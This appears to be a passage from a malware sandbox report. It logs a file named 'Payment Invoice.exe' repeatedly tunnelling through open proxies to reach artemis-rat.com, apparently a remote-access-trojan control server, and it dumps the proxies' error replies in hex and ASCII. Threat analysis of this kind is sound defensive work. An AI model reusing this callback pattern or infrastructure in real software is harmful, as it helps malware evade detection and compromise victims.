                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                454192.168.2.45137351.158.79.76163797076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.296205997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.981281996 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                455192.168.2.450807159.223.71.71565817076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.382482052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.479851961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.559567928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.683274984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:40.776863098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:52.792351961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:04.886126041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:28.886111975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                456192.168.2.45139351.75.206.209807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.383063078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.089346886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.089351892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.980187893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.284281969 CET536INHTTP/1.1 500 Internal Server Error
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Server: Apache/2.4.38 (Debian)
                                                                Content-Length: 614
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of
                                                                Mar 11, 2024 16:15:21.284976959 CET270INData Raw: 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72
                                                                Data Ascii: the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.38 (Debian) Server at artemis-rat.com Port 44


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                457192.168.2.451438198.23.229.203156737076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.383459091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.886214018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                458192.168.2.450822213.136.78.200285137076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.384749889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.479875088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.559567928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                459192.168.2.451390213.136.78.200199257076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.384952068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.089345932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.089437962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.980226994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.777245998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                460192.168.2.451367120.78.191.68807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.385009050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.734673023 CET318INHTTP/1.1 400 Bad Request
                                                                Server: openresty
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Content-Length: 154
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
                                                                Mar 11, 2024 16:15:16.734869957 CET767INHTTP/1.1 403 Forbidden
                                                                Server: Beaver
                                                                Cache-Control: no-cache
                                                                Content-Type: text/html
                                                                Content-Length: 635
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                461192.168.2.451381185.217.143.23807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.385481119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                462192.168.2.45089985.25.177.53588517076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.385705948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.479958057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.559564114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.683274984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                463192.168.2.451485172.67.182.165807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.385879040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.542047977 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                464192.168.2.45133658.20.248.13990027076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.387476921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.810094118 CET311INHTTP/1.1 400 Bad Request
                                                                Server: nginx
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 166
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                465192.168.2.45096814.103.24.14880007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.387975931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                466192.168.2.451436190.153.121.241457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.389062881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                467192.168.2.450963122.116.150.290007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.390085936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                468192.168.2.451433184.181.217.21041457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.393443108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                469192.168.2.451427147.75.92.251100107076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.395454884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.671839952 CET356INHTTP/1.0 502 Bad Gateway
                                                                Server: Zscaler/6.3
                                                                Content-Type: text/html
                                                                Connection: close
